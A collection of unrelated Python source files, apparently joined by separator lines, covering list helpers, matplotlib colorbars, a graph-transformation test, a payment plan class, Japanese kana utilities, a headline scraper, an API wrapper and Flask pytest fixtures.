save_mnist(yy,prefix="ae-{}".format(k))
print("\ndone.")
|
""" This file contains code for working on lists and dictionaries. """
def moreThanOne(dict, key):
""" Checks if a key in a dictionary has a value more than one.
Arguments:
dict -- the dictionary
key -- the key
Returns:
True if the key exists in the dictionary and the value is at least one, otherwise false
"""
return key in dict and dict[key] > 0
def anyMoreThanOne(dict, keys):
""" Checks if any of a list of keys in a dictionary has a value more than one.
Arguments:
dict -- the dictionary
keys -- the keys
Returns:
True if any key exists in the dictionary and the value is at least one, otherwise false
"""
for key in keys:
if key in dict and dict[key] > 0:
return True
return False
def makeUnique(list):
""" Removes duplicates from a list. """
u = []
for l in list:
if not l in u:
u.append(l)
return u
def alphabetical(lst):
""" Sorts a list of tuples in reverse alphabetical order by the first key
in the tuple.
Arguments:
lst -- the list to sort
Returns:
the sorted list
"""
return list(reversed(sorted(lst, key=lambda x: x[0])))
|
desc = 'Color bars'
phash = ''
def plot():
import matplotlib as mpl
from matplotlib import pyplot as pp
from matplotlib import style
import numpy as np
# Make a figure and axes with dimensions as desired.
fig, ax = pp.subplots(3)
# Set the colormap and norm to correspond to the data for which
# the colorbar will be used.
cmap = mpl.cm.cool
norm = mpl.colors.Normalize(vmin=-5, vmax=10)
# ColorbarBase derives from ScalarMappable and puts a colorbar in a
# specified axes, so it has everything needed for a standalone colorbar.
# There are many more kwargs, but the following gives a basic continuous
# colorbar with ticks and labels.
cb1 = mpl.colorbar.ColorbarBase(
ax[0],
cmap=cmap,
norm=norm,
orientation='horizontal'
)
cb1.set_label('Some Units')
# The second example illustrates the use of a ListedColormap, a
# BoundaryNorm, and extended ends to show the "over" and "under" value
# colors.
cmap = mpl.colors.ListedColormap(['r', 'g', 'b', 'c'])
cmap.set_over('0.25')
cmap.set_under('0.75')
# If a ListedColormap is used, the length of the bounds array must be one
# greater than the length of the color list. The bounds must be
# monotonically increasing.
bounds = [1, 2, 4, 7, 8]
norm = mpl.colors.BoundaryNorm(bounds, cmap.N)
cb2 = mpl.colorbar.ColorbarBase(
ax[1],
cmap=cmap,
norm=norm,
# to use 'extend', you must
# specify two extra boundaries:
boundaries=[0] + bounds + [13],
extend='both',
ticks=bounds, # optional
spacing='proportional',
orientation='horizontal'
)
cb2.set_label('Discrete intervals, some other units')
# The third example illustrates the use of custom length colorbar
# extensions, used on a colorbar with discrete intervals.
cmap = mpl.colors.ListedColormap(
[[0., .4, 1.],
[0., .8, 1.],
[1., .8, 0.],
[1., .4, 0.]
])
cmap.set_over((1., 0., 0.))
cmap.set_under((0., 0., 1.))
bounds = [-1., -.5, 0., .5, 1.]
norm = mpl.colors.BoundaryNorm(bounds, cmap.N)
cb3 = mpl.colorbar.ColorbarBase(
ax[2],
cmap=cmap,
norm=norm,
boundaries=[-10]+bounds+[10],
extend='both',
# Make the length of each extension
# the same as the length of the
# interior colors:
extendfrac='auto',
ticks=bounds,
spacing='uniform',
orientation='horizontal'
)
cb3.set_label('Custom extension lengths, some other units')
return fig
|
import lexer
s = "program id; var beto: int; { id = 1234; }"
lexer.lexer.input(s)
for token in lexer.lexer:
print token
|
'''
Created on 2013-01-22
@author: levi
'''
import unittest
import time
from path_condition_generator import PathConditionGenerator
from t_core.matcher import Matcher
from t_core.rewriter import Rewriter
from t_core.iterator import Iterator
from t_core.messages import Packet
from t_core.tc_python.frule import FRule
from t_core.tc_python.arule import ARule
from merge_preprocess import MergePreprocessFactory
from police_station_transformation.run1.transformation.HS2S_run1 import HS2S_run1
from police_station_transformation.run1.transformation.HM2M_run1 import HM2M_run1
from police_station_transformation.run1.transformation.HF2F_run1 import HF2F_run1
from police_station_transformation.run1.transformation.HSM2SM_run1 import HSM2SM_run1
from police_station_transformation.run1.transformation.HSF2SF_run1 import HSF2SF_run1
from police_station_transformation.run1.transformation.HMM2MM_run1 import HMM2MM_run1
from police_station_transformation.run1.transformation.HFF2FF_run1 import HFF2FF_run1
from police_station_transformation.run1.backward_matchers.HSM2SMBackS2S_run1LHS import HSM2SMBackS2S_run1LHS
from police_station_transformation.run1.backward_matchers.HSM2SMBackM2M_run1LHS import HSM2SMBackM2M_run1LHS
from police_station_transformation.run1.backward_matchers.HSF2SFBackS2S_run1LHS import HSF2SFBackS2S_run1LHS
from police_station_transformation.run1.backward_matchers.HSF2SFBackF2F_run1LHS import HSF2SFBackF2F_run1LHS
from police_station_transformation.run1.backward_matchers.HMM2MMBackM2M1_run1LHS import HMM2MMBackM2M1_run1LHS
from police_station_transformation.run1.backward_matchers.HMM2MMBackM2M2_run1LHS import HMM2MMBackM2M2_run1LHS
from police_station_transformation.run1.backward_matchers.HFF2FFBackF2F1_run1LHS import HFF2FFBackF2F1_run1LHS
from police_station_transformation.run1.backward_matchers.HFF2FFBackF2F2_run1LHS import HFF2FFBackF2F2_run1LHS
from police_station_transformation.run1.backward_matchers.HSM2SMBackComplete_run1LHS import HSM2SMBackComplete_run1LHS
from police_station_transformation.run1.backward_matchers.HSF2SFBackComplete_run1LHS import HSF2SFBackComplete_run1LHS
from police_station_transformation.run1.backward_matchers.HMM2MMBackComplete_run1LHS import HMM2MMBackComplete_run1LHS
from police_station_transformation.run1.backward_matchers.HFF2FFBackComplete_run1LHS import HFF2FFBackComplete_run1LHS
from police_station_transformation.run2.transformation.HS2S_run2 import HS2S_run2
from police_station_transformation.run2.transformation.HM2M_run2 import HM2M_run2
from police_station_transformation.run2.transformation.HF2F_run2 import HF2F_run2
from police_station_transformation.run2.transformation.HSM2SM_run2 import HSM2SM_run2
from police_station_transformation.run2.transformation.HSF2SF_run2 import HSF2SF_run2
from police_station_transformation.run2.transformation.HMM2MM_run2 import HMM2MM_run2
from police_station_transformation.run2.transformation.HFF2FF_run2 import HFF2FF_run2
from police_station_transformation.run2.backward_matchers.HSM2SMBackS2S_run2LHS import HSM2SMBackS2S_run2LHS
from police_station_transformation.run2.backward_matchers.HSM2SMBackM2M_run2LHS import HSM2SMBackM2M_run2LHS
from police_station_transformation.run2.backward_matchers.HSF2SFBackS2S_run2LHS import HSF2SFBackS2S_run2LHS
from police_station_transformation.run2.backward_matchers.HSF2SFBackF2F_run2LHS import HSF2SFBackF2F_run2LHS
from police_station_transformation.run2.backward_matchers.HMM2MMBackM2M1_run2LHS import HMM2MMBackM2M1_run2LHS
from police_station_transformation.run2.backward_matchers.HMM2MMBackM2M2_run2LHS import HMM2MMBackM2M2_run2LHS
from police_station_transformation.run2.backward_matchers.HFF2FFBackF2F1_run2LHS import HFF2FFBackF2F1_run2LHS
from police_station_transformation.run2.backward_matchers.HFF2FFBackF2F2_run2LHS import HFF2FFBackF2F2_run2LHS
from police_station_transformation.run2.backward_matchers.HSM2SMBackComplete_run2LHS import HSM2SMBackComplete_run2LHS
from police_station_transformation.run2.backward_matchers.HSF2SFBackComplete_run2LHS import HSF2SFBackComplete_run2LHS
from police_station_transformation.run2.backward_matchers.HMM2MMBackComplete_run2LHS import HMM2MMBackComplete_run2LHS
from police_station_transformation.run2.backward_matchers.HFF2FFBackComplete_run2LHS import HFF2FFBackComplete_run2LHS
from police_station_transformation.run3.transformation.HS2S_run3 import HS2S_run3
from police_station_transformation.run3.transformation.HM2M_run3 import HM2M_run3
from police_station_transformation.run3.transformation.HF2F_run3 import HF2F_run3
from police_station_transformation.run3.transformation.HSM2SM_run3 import HSM2SM_run3
from police_station_transformation.run3.transformation.HSF2SF_run3 import HSF2SF_run3
from police_station_transformation.run3.transformation.HMM2MM_run3 import HMM2MM_run3
from police_station_transformation.run3.transformation.HFF2FF_run3 import HFF2FF_run3
from police_station_transformation.run3.backward_matchers.HSM2SMBackS2S_run3LHS import HSM2SMBackS2S_run3LHS
from police_station_transformation.run3.backward_matchers.HSM2SMBackM2M_run3LHS import HSM2SMBackM2M_run3LHS
from police_station_transformation.run3.backward_matchers.HSF2SFBackS2S_run3LHS import HSF2SFBackS2S_run3LHS
from police_station_transformation.run3.backward_matchers.HSF2SFBackF2F_run3LHS import HSF2SFBackF2F_run3LHS
from police_station_transformation.run3.backward_matchers.HMM2MMBackM2M1_run3LHS import HMM2MMBackM2M1_run3LHS
from police_station_transformation.run3.backward_matchers.HMM2MMBackM2M2_run3LHS import HMM2MMBackM2M2_run3LHS
from police_station_transformation.run3.backward_matchers.HFF2FFBackF2F1_run3LHS import HFF2FFBackF2F1_run3LHS
from police_station_transformation.run3.backward_matchers.HFF2FFBackF2F2_run3LHS import HFF2FFBackF2F2_run3LHS
from police_station_transformation.run3.backward_matchers.HSM2SMBackComplete_run3LHS import HSM2SMBackComplete_run3LHS
from police_station_transformation.run3.backward_matchers.HSF2SFBackComplete_run3LHS import HSF2SFBackComplete_run3LHS
from police_station_transformation.run3.backward_matchers.HMM2MMBackComplete_run3LHS import HMM2MMBackComplete_run3LHS
from police_station_transformation.run3.backward_matchers.HFF2FFBackComplete_run3LHS import HFF2FFBackComplete_run3LHS
from police_station_transformation.run4.transformation.HS2S_run4 import HS2S_run4
from police_station_transformation.run4.transformation.HM2M_run4 import HM2M_run4
from police_station_transformation.run4.transformation.HF2F_run4 import HF2F_run4
from police_station_transformation.run4.transformation.HSM2SM_run4 import HSM2SM_run4
from police_station_transformation.run4.transformation.HSF2SF_run4 import HSF2SF_run4
from police_station_transformation.run4.transformation.HMM2MM_run4 import HMM2MM_run4
from police_station_transformation.run4.transformation.HFF2FF_run4 import HFF2FF_run4
from police_station_transformation.run4.backward_matchers.HSM2SMBackS2S_run4LHS import HSM2SMBackS2S_run4LHS
from police_station_transformation.run4.backward_matchers.HSM2SMBackM2M_run4LHS import HSM2SMBackM2M_run4LHS
from police_station_transformation.run4.backward_matchers.HSF2SFBackS2S_run4LHS import HSF2SFBackS2S_run4LHS
from police_station_transformation.run4.backward_matchers.HSF2SFBackF2F_run4LHS import HSF2SFBackF2F_run4LHS
from police_station_transformation.run4.backward_matchers.HMM2MMBackM2M1_run4LHS import HMM2MMBackM2M1_run4LHS
from police_station_transformation.run4.backward_matchers.HMM2MMBackM2M2_run4LHS import HMM2MMBackM2M2_run4LHS
from police_station_transformation.run4.backward_matchers.HFF2FFBackF2F1_run4LHS import HFF2FFBackF2F1_run4LHS
from police_station_transformation.run4.backward_matchers.HFF2FFBackF2F2_run4LHS import HFF2FFBackF2F2_run4LHS
from police_station_transformation.run4.backward_matchers.HSM2SMBackComplete_run4LHS import HSM2SMBackComplete_run4LHS
from police_station_transformation.run4.backward_matchers.HSF2SFBackComplete_run4LHS import HSF2SFBackComplete_run4LHS
from police_station_transformation.run4.backward_matchers.HMM2MMBackComplete_run4LHS import HMM2MMBackComplete_run4LHS
from police_station_transformation.run4.backward_matchers.HFF2FFBackComplete_run4LHS import HFF2FFBackComplete_run4LHS
from property_prover_rules.traceability_construction.Himesis.HBuildTraceabilityForRuleLHS import HBuildTraceabilityForRuleLHS
from property_prover_rules.traceability_construction.Himesis.HBuildTraceabilityForRuleRHS import HBuildTraceabilityForRuleRHS
from police_station_transformation.traceability.HTraceabilityConstructionLHS import HTraceabilityConstructionLHS
from police_station_transformation.traceability.HTraceabilityConstructionRHS import HTraceabilityConstructionRHS
from police_station_transformation.traceability.HBuildTraceabilityGMLHS import HBuildTraceabilityGMLHS
from police_station_transformation.traceability.HBuildTraceabilityGMRHS import HBuildTraceabilityGMRHS
from copy import deepcopy
from himesis_utils import disjoint_model_union, graph_to_dot
from merge_inter_layer import MergeInterLayerFactory
class Test(unittest.TestCase):
def setUp(self):
self.rules = { 'HS2S_run1': HS2S_run1(),
'HM2M_run1': HM2M_run1(),
'HF2F_run1': HF2F_run1(),
'HSM2SM_run1': HSM2SM_run1(),
'HSF2SF_run1': HSF2SF_run1(),
'HMM2MM_run1': HMM2MM_run1(),
'HFF2FF_run1': HFF2FF_run1(),
'HS2S_run2': HS2S_run2(),
'HM2M_run2': HM2M_run2(),
'HF2F_run2': HF2F_run2(),
'HSM2SM_run2': HSM2SM_run2(),
'HSF2SF_run2': HSF2SF_run2(),
'HMM2MM_run2': HMM2MM_run2(),
'HFF2FF_run2': HFF2FF_run2(),
'HS2S_run3': HS2S_run3(),
'HM2M_run3': HM2M_run3(),
'HF2F_run3': HF2F_run3(),
'HSM2SM_run3': HSM2SM_run3(),
'HSF2SF_run3': HSF2SF_run3(),
'HMM2MM_run3': HMM2MM_run3(),
'HFF2FF_run3': HFF2FF_run3(),
'HS2S_run4': HS2S_run4(),
'HM2M_run4': HM2M_run4(),
'HF2F_run4': HF2F_run4(),
'HSM2SM_run4': HSM2SM_run4(),
'HSF2SF_run4': HSF2SF_run4(),
'HMM2MM_run4': HMM2MM_run4(),
'HFF2FF_run4': HFF2FF_run4()}
self.backwardPatterns = { 'HS2S_run1': None,
'HM2M_run1': None,
'HF2F_run1': None,
'HSM2SM_run1': [Matcher(HSM2SMBackS2S_run1LHS()),Matcher(HSM2SMBackM2M_run1LHS())],
'HSF2SF_run1': [Matcher(HSF2SFBackS2S_run1LHS()),Matcher(HSF2SFBackF2F_run1LHS())],
'HMM2MM_run1': [Matcher(HMM2MMBackM2M1_run1LHS()),Matcher(HMM2MMBackM2M2_run1LHS())],
'HFF2FF_run1': [Matcher(HFF2FFBackF2F1_run1LHS()),Matcher(HFF2FFBackF2F2_run1LHS())],
'HS2S_run2': None,
'HM2M_run2': None,
'HF2F_run2': None,
'HSM2SM_run2': [Matcher(HSM2SMBackS2S_run2LHS()),Matcher(HSM2SMBackM2M_run2LHS())],
'HSF2SF_run2': [Matcher(HSF2SFBackS2S_run2LHS()),Matcher(HSF2SFBackF2F_run2LHS())],
'HMM2MM_run2': [Matcher(HMM2MMBackM2M1_run2LHS()),Matcher(HMM2MMBackM2M2_run2LHS())],
'HFF2FF_run2': [Matcher(HFF2FFBackF2F1_run2LHS()),Matcher(HFF2FFBackF2F2_run2LHS())],
'HS2S_run3': None,
'HM2M_run3': None,
'HF2F_run3': None,
'HSM2SM_run3': [Matcher(HSM2SMBackS2S_run3LHS()),Matcher(HSM2SMBackM2M_run3LHS())],
'HSF2SF_run3': [Matcher(HSF2SFBackS2S_run3LHS()),Matcher(HSF2SFBackF2F_run3LHS())],
'HMM2MM_run3': [Matcher(HMM2MMBackM2M1_run3LHS()),Matcher(HMM2MMBackM2M2_run3LHS())],
'HFF2FF_run3': [Matcher(HFF2FFBackF2F1_run3LHS()),Matcher(HFF2FFBackF2F2_run3LHS())],
'HS2S_run4': None,
'HM2M_run4': None,
'HF2F_run4': None,
'HSM2SM_run4': [Matcher(HSM2SMBackS2S_run4LHS()),Matcher(HSM2SMBackM2M_run4LHS())],
'HSF2SF_run4': [Matcher(HSF2SFBackS2S_run4LHS()),Matcher(HSF2SFBackF2F_run4LHS())],
'HMM2MM_run4': [Matcher(HMM2MMBackM2M1_run4LHS()),Matcher(HMM2MMBackM2M2_run4LHS())],
'HFF2FF_run4': [Matcher(HFF2FFBackF2F1_run4LHS()),Matcher(HFF2FFBackF2F2_run4LHS())]}
self.backwardPatterns2Rules = { 'HSM2SMBackS2S_run1LHS': 'HSM2SM_run1',
'HSM2SMBackM2M_run1LHS': 'HSM2SM_run1',
'HSF2SFBackS2S_run1LHS': 'HSF2SF_run1',
'HSF2SFBackF2F_run1LHS': 'HSF2SF_run1',
'HMM2MMBackM2M1_run1LHS': 'HMM2MM_run1',
'HMM2MMBackM2M2_run1LHS': 'HMM2MM_run1',
'HFF2FFBackF2F1_run1LHS': 'HFF2FF_run1',
'HFF2FFBackF2F2_run1LHS': 'HFF2FF_run1',
'HSM2SMBackS2S_run2LHS': 'HSM2SM_run2',
'HSM2SMBackM2M_run2LHS': 'HSM2SM_run2',
'HSF2SFBackS2S_run2LHS': 'HSF2SF_run2',
'HSF2SFBackF2F_run2LHS': 'HSF2SF_run2',
'HMM2MMBackM2M1_run2LHS': 'HMM2MM_run2',
'HMM2MMBackM2M2_run2LHS': 'HMM2MM_run2',
'HFF2FFBackF2F1_run2LHS': 'HFF2FF_run2',
'HFF2FFBackF2F2_run2LHS': 'HFF2FF_run2',
'HSM2SMBackS2S_run3LHS': 'HSM2SM_run3',
'HSM2SMBackM2M_run3LHS': 'HSM2SM_run3',
'HSF2SFBackS2S_run3LHS': 'HSF2SF_run3',
'HSF2SFBackF2F_run3LHS': 'HSF2SF_run3',
'HMM2MMBackM2M1_run3LHS': 'HMM2MM_run3',
'HMM2MMBackM2M2_run3LHS': 'HMM2MM_run3',
'HFF2FFBackF2F1_run3LHS': 'HFF2FF_run3',
'HFF2FFBackF2F2_run3LHS': 'HFF2FF_run3',
'HSM2SMBackS2S_run4LHS': 'HSM2SM_run4',
'HSM2SMBackM2M_run4LHS': 'HSM2SM_run4',
'HSF2SFBackS2S_run4LHS': 'HSF2SF_run4',
'HSF2SFBackF2F_run4LHS': 'HSF2SF_run4',
'HMM2MMBackM2M1_run4LHS': 'HMM2MM_run4',
'HMM2MMBackM2M2_run4LHS': 'HMM2MM_run4',
'HFF2FFBackF2F1_run4LHS': 'HFF2FF_run4',
'HFF2FFBackF2F2_run4LHS': 'HFF2FF_run4'}
self.backwardPatternsComplete = {
'HS2S_run1': None,
'HM2M_run1': None,
'HF2F_run1': None,
'HSM2SM_run1': [Matcher(HSM2SMBackComplete_run1LHS())],
'HSF2SF_run1': [Matcher(HSF2SFBackComplete_run1LHS())],
'HMM2MM_run1': [Matcher(HMM2MMBackComplete_run1LHS())],
'HFF2FF_run1': [Matcher(HFF2FFBackComplete_run1LHS())],
'HS2S_run2': None,
'HM2M_run2': None,
'HF2F_run2': None,
'HSM2SM_run2': [Matcher(HSM2SMBackComplete_run2LHS())],
'HSF2SF_run2': [Matcher(HSF2SFBackComplete_run2LHS())],
'HMM2MM_run2': [Matcher(HMM2MMBackComplete_run2LHS())],
'HFF2FF_run2': [Matcher(HFF2FFBackComplete_run2LHS())],
'HS2S_run3': None,
'HM2M_run3': None,
'HF2F_run3': None,
'HSM2SM_run3': [Matcher(HSM2SMBackComplete_run3LHS())],
'HSF2SF_run3': [Matcher(HSF2SFBackComplete_run3LHS())],
'HMM2MM_run3': [Matcher(HMM2MMBackComplete_run3LHS())],
'HFF2FF_run3': [Matcher(HFF2FFBackComplete_run3LHS())],
'HS2S_run4': None,
'HM2M_run4': None,
'HF2F_run4': None,
'HSM2SM_run4': [Matcher(HSM2SMBackComplete_run4LHS())],
'HSF2SF_run4': [Matcher(HSF2SFBackComplete_run4LHS())],
'HMM2MM_run4': [Matcher(HMM2MMBackComplete_run4LHS())],
'HFF2FF_run4': [Matcher(HFF2FFBackComplete_run4LHS())]}
def test_combine(self):
build_traceability_for_rule = ARule(HBuildTraceabilityForRuleLHS(),HBuildTraceabilityForRuleRHS())
build_traceability_for_rule_match = Matcher(HBuildTraceabilityForRuleLHS())
build_traceability_for_rule_rewrite = Rewriter(HBuildTraceabilityForRuleRHS())
s2s = HS2S_run1()
m2m = HM2M_run1()
f2f = HF2F_run1()
sm2sm = HSM2SM_run1()
sf2sf = HSF2SF_run1()
mm2mm = HMM2MM_run1()
ff2ff = HFF2FF_run1()
mergeInterLayerFactory = MergeInterLayerFactory(1)
combineResult = mergeInterLayerFactory.merge_two_rules_inter_layer(mm2mm,m2m)
graph_to_dot("combinelargerrule", combineResult, 1)
l = [HSM2SM_run1(),HFF2FF_run1()]
l.extend([])
print l
|
'''
plans.py
'''
from forex_python.converter import CurrencyCodes
from .base import Base
class Plan(Base):
'''
Plan class for making payment plans
'''
interval = None
name = None
amount = None
plan_code = None
currency = None
id = None
send_sms = True
send_invoices = True
description = None
__interval_values = ('hourly', 'daily', 'weekly', 'monthly', 'annually')
def __init__(self, name, interval, amount, currency='NGN', plan_code=None,
id=None, send_sms=None, send_invoices=None, description=None):
super().__init__()
#Check if currency supplied is valid
if not CurrencyCodes().get_symbol(currency.upper()):
raise ValueError("Invalid currency supplied")
if interval.lower() not in self.__interval_values:
raise ValueError("Interval should be one of 'hourly',"
"'daily', 'weekly', 'monthly','annually'"
)
try:
amount = int(amount)
except ValueError:
raise ValueError("Invalid amount")
else:
self.interval = interval.lower()
self.name = name
self.interval = interval
self.amount = amount
self.currency = currency
self.plan_code = plan_code
self.id = id
self.send_sms = send_sms
self.send_invoices = send_invoices
self.description = description
def __str__(self):
return "%s plan" % self.name
|
from __future__ import unicode_literals
from jcconv import kata2hira, hira2kata
from itertools import chain
from printable import PrintableDict, PrintableList
__by_vowels = PrintableDict(**{
u'ア': u'ワラヤャマハナタサカアァ',
u'イ': u'リミヒニちシキイィ',
u'ウ': u'ルユュムフヌツスクウゥ',
u'エ': u'レメヘネテセケエェ',
u'オ': u'ヲロヨョモホノトソコオォ',
})
__to_dakuten = PrintableDict(**{
u'か': u'が',
u'き': u'ぎ',
u'く': u'ぐ',
u'け': u'げ',
u'こ': u'ご',
u'さ': u'ざ',
u'し': u'じ',
u'す': u'ず',
u'せ': u'ぜ',
u'そ': u'ぞ',
u'た': u'だ',
u'ち': u'ぢ',
u'つ': u'づ',
u'て': u'で',
u'と': u'ど',
u'は': u'ばぱ',
u'ひ': u'びぴ',
u'ふ': u'ぶぷ',
u'へ': u'べぺ',
u'ほ': u'ぼぽ',
})
__to_mini = PrintableDict(**{
u'く': u'っ',
u'つ': u'っ',
u'や': u'ゃ',
u'よ': u'ょ',
u'ゆ': u'ゅ',
u'わ': u'ゎ',
u'か': u'ゕ',
u'け': u'ゖ',
u'あ': u'ぁ',
u'い': u'ぃ',
u'う': u'ぅ',
u'え': u'ぇ',
u'お': u'ぉ',
})
EXTENDABLE_MINIS = (
u'つ',
u'く',
)
__by_dakuten = PrintableDict()
for vowel, letters in __to_dakuten.iteritems():
for letter in letters:
__by_dakuten[letter] = vowel
__to_vowels = PrintableDict()
for vowel, letters in __by_vowels.iteritems():
for letter in letters:
__to_vowels[letter] = vowel
def codepoint_range(start, end):
for val in range(start, end):
try:
yield unichr(val)
except ValueError:
# Sometimes certain codepoints can't be used on a machine
pass
def char_set(value):
if isinstance(value, list) or isinstance(value, tuple):
return codepoint_range(*value)
else:
return [value]
def unipairs(lst):
return PrintableList(reduce(lambda a, b: chain(a, b), map(char_set, lst)))
__KATAKANA = (
# Katakana: http://en.wikipedia.org/wiki/Katakana
(0x30A0, 0x30FF + 1),
(0x31F0, 0x31FF + 1),
(0x3200, 0x32FF + 1),
(0xFF00, 0xFFEF + 1),
)
__HIRAGANA = (
# Hiragana: http://en.wikipedia.org/wiki/Hiragana
(0x3040, 0x309F + 1),
(0x1B000, 0x1B0FF + 1),
)
__KANJI = (
(0x4e00, 0x9faf + 1),
)
__BONUS_KANA = (
u'〜',
)
KATAKANA = unipairs(__KATAKANA)
HIRAGANA = unipairs(__HIRAGANA)
KANA = PrintableList(KATAKANA + HIRAGANA + unipairs(__BONUS_KANA))
KANJI = unipairs(__KANJI)
def __is_katakana(char):
return char in KATAKANA
def is_katakana(string):
for char in string:
if not __is_katakana(char):
return False
return True
def __is_hiragana(char):
return char in HIRAGANA
def is_hiragana(string):
for char in string:
if not __is_hiragana(char):
return False
return True
def __is_kana(char):
return char in KANA
def is_kana(string):
for char in string:
if not __is_kana(char):
return False
return True
def __is_kanji(char):
return char in KANJI
def is_kanji(string):
for char in string:
if not __is_kanji(char):
return False
return True
def kana_minus_dakuten(char):
if is_katakana(char):
hira = kata2hira(char)
hira = __by_dakuten.get(hira, hira)
return hira2kata(hira)
else:
return __by_dakuten.get(char, char)
def kana_plus_dakuten(char):
yield char
is_kata = is_katakana(char)
if is_kata:
char = kata2hira(char)
for char in __to_dakuten.get(char, ''):
yield hira2kata(char) if is_kata else char
def kana_plus_mini(char):
yield char
is_kata = is_katakana(char)
if is_kata:
char = kata2hira(char)
for char in __to_mini.get(char, ''):
yield hira2kata(char) if is_kata else char
def extend_dakuten_reading(string):
if len(string) == 0:
yield ''
return
char = string[0]
for mult in kana_plus_dakuten(char):
yield mult + string[1:]
def extend_mini_reading(string):
if len(string) == 0:
yield ''
return
char = string[-1]
if char not in EXTENDABLE_MINIS:
yield string
return
for substr in kana_plus_mini(char):
yield string[:-1] + substr
def char_to_base_vowel(char):
char = kana_minus_dakuten(char)
translated = __to_vowels.get(char, False) or __to_vowels.get(hira2kata(char), False)
if translated is False:
raise Exception(u"Can't convert")
return translated
def all_to_hiragana(string):
out = u''
for index, char in enumerate(string):
if char == u'ー' or char == u'|':
char = char_to_base_vowel(out[-1])
char = kata2hira(char)
out += char
return out
if __name__ == u'__main__':
from tester import *
test_equal(kana_minus_dakuten(u'は'), u'は', u"No Dakuten failure")
test_equal(kana_minus_dakuten(u'ば'), u'は', u"No Dakuten failure")
test_equal(kana_minus_dakuten(u'ぱ'), u'は', u"No Dakuten failure")
test_equal(kana_minus_dakuten(u'ジ'), u'シ', u"Katakana failure")
test_equal(kana_minus_dakuten(u'本'), u'本', u"Kanji changed")
test_true(is_katakana(u'ハ'), u"Katakana check wrong")
test_true(is_katakana(u'ー'), u"Katakana check wrong")
test_true(is_katakana(u'ジ'), u"Katakana check wrong")
test_true(is_katakana(u'ッ'), u"Katakana check wrong")
test_true(not is_katakana(u'本'), u"Katakana Kanji check wrong")
test_true(not is_katakana(u'っ'), u"Katakana small hiragana check wrong")
test_true(not is_katakana(u'は'), u"Katakana hiragana wrong")
test_true(is_hiragana(u'っ'), u"Hiragana check wrong")
test_true(is_hiragana(u'つ'), u"Hiragana check wrong")
test_true(is_hiragana(u'を'), u"Hiragana check wrong")
test_true(not is_hiragana(u'本'), u"Hiragana Kanji check wrong")
test_true(not is_hiragana(u'ッ'), u"Hiragana small katakana check wrong")
test_true(not is_hiragana(u'ハ'), u"Hiragana katakana check wrong")
test_true(is_kana(u'っ'), u"Kana check wrong")
test_true(is_kana(u'つ'), u"Kana check wrong")
test_true(is_kana(u'を'), u"Kana check wrong")
test_true(is_kana(u'ッ'), u"Kana check wrong")
test_true(is_kana(u'ハ'), u"Kana check wrong")
test_true(is_kana(u'〜・'), u"Kana special check wrong")
test_true(not is_kana(u'本'), u"Kana check wrong")
test_equal(kana_minus_dakuten(u'は'), u'は')
test_equal(kana_minus_dakuten(u'ば'), u'は')
test_equal(kana_minus_dakuten(u'バ'), u'ハ')
test_equal(kana_minus_dakuten(u'本'), u'本')
test_equal(''.join(kana_plus_dakuten(u'は')), u'はばぱ')
test_equal(''.join(kana_plus_dakuten(u'本')), u'本')
test_equal(''.join(kana_plus_dakuten(u'シ')), u'シジ')
test_list_equal(extend_dakuten_reading(u'しゃし'), [u'しゃし', u'じゃし'])
test_list_equal(extend_mini_reading(u'し'), [u'し'])
test_list_equal(extend_mini_reading(u'いつ'), [u'いつ', u'いっ'])
test_equal(all_to_hiragana(u'ジータ'), u'じいた')
|
import requests, os
from bs4 import BeautifulSoup
url = 'http://www.nytimes.com'
def extractArticles (url):
data = requests.get(url)
soup = BeautifulSoup(data.text, 'html.parser')
articles = []
for article in soup.find_all('article'):
if article.find('h2') != None and article.find('h2').find('a') != None:
heading = article.find('h2').find('a').get_text().strip()
if heading != "":
articles.append(heading)
articles = sorted(list(set(articles)))
f = open('./articles/headlines2.txt', 'w')
for heading in articles:
f.write(heading)
f.write('\n')
f.close()
extractArticles(url)
|
from base import IfbyphoneApiBase
class Addons(IfbyphoneApiBase):
def list(self):
"""List all purchased Addons for an account
"""
self.options['action'] = 'addons.list'
return self.call(self.options)
def purchase(self, **kwargs):
"""Purchase an addon for an account
keyword arguments:
item_id -- ID number of desired addon
qty -- the quantity of the addon
send_receipt -- set to 1 to send a receipt to account email
"""
self.options.update(kwargs)
self.options['action'] = 'addons.purchase'
return self.call(self.options)
|
"""Utility functions.
"""
from collections import OrderedDict
from .bsd_checksum import bsd_checksum # make name available from this module
def n_(s, replacement='_'):
"""Make binary fields more readable.
"""
if isinstance(s, (str, unicode, bytearray)):
return s.replace('\0', replacement)
return s
def split_string(s, *ndxs):
"""String sub-class with a split() method that splits a given indexes.
Usage:
>>> print split_string('D2008022002', 1, 5, 7, 9)
['D', '2008', '02', '20', '02']
"""
if len(ndxs) == 0:
return [s]
if len(ndxs) == 1:
i = ndxs[0]
return [s[:i], s[i:]]
res = []
b = 0
while ndxs:
a, b, ndxs = b, ndxs[0], ndxs[1:]
res.append(s[a:b])
res.append(s[b:])
return res
def split_fields(s, sizes):
"""Split a string into fields based on field `sizes`.
"""
slen = len(s)
if None in sizes:
nonesize = slen - sum(v for v in sizes if v is not None)
sizes = [v or nonesize for v in sizes]
ndxs = [sizes[0]]
cur = 1
while cur < len(sizes) - 1:
ndxs.append(ndxs[-1] + sizes[cur])
cur += 1
return split_string(s, *ndxs)
class pset(OrderedDict):
"""A property set is an OrderedDict with prettier string display
(useful when working with record lengths that are wider than your
terminal).
"""
def __repr__(self):
return '{%s}' % ', '.join('%s: %r' % (str(k), str(v))
for k,v in self.items())
def __str__(self):
return "{\n%s\n}" % ',\n'.join(' %s: %r' % (str(k), str(v))
for k,v in self.items())
def pad(data, size, padchar=' '):
"""Pad the `data` to exactly length = `size`.
"""
if len(data) > size:
raise ValueError("Data is longer than size, cannot pad.")
if len(data) == size:
return data
return data + padchar * (size - len(data))
|
import pytest
from tests import utils
from app import create_app
@pytest.yield_fixture(scope='session')
def flask_app():
app = create_app(flask_config_name='testing')
from app.extensions import db
with app.app_context():
db.create_all()
yield app
db.drop_all()
@pytest.yield_fixture()
def db(flask_app):
# pylint: disable=unused-argument,invalid-name
from app.extensions import db as db_instance
yield db_instance
db_instance.session.rollback()
@pytest.fixture(scope='session')
def flask_app_client(flask_app):
flask_app.test_client_class = utils.AutoAuthFlaskClient
flask_app.response_class = utils.JSONResponse
return flask_app.test_client()
@pytest.yield_fixture(scope='session')
def regular_user(flask_app):
# pylint: disable=invalid-name,unused-argument
from app.extensions import db
regular_user_instance = utils.generate_user_instance(
username='regular_user'
)
db.session.add(regular_user_instance)
db.session.commit()
yield regular_user_instance
